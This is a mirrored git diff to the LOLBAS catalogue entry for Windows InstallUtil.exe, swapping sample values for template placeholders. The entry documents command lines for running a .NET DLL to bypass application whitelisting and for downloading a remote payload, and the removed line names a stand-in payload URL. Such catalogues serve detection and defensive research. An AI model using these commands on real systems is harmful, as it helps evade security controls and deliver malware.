mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
@@ -4,7 +4,7 @@ Description: The Installer tool is a command-line utility that allows you to ins
|
||||
Author: Oddvar Moe
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: AWL Bypass
|
||||
@@ -14,7 +14,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: DLL (.NET)
|
||||
- Execute: EXE (.NET)
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
Category: Execute
|
||||
@@ -24,7 +24,7 @@ Commands:
|
||||
Tags:
|
||||
- Execute: DLL (.NET)
|
||||
- Execute: EXE (.NET)
|
||||
- Command: InstallUtil.exe https://example.com/payload
|
||||
- Command: InstallUtil.exe {REMOTEURL}
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
Category: Download
|
||||
|
Reference in New Issue
Block a user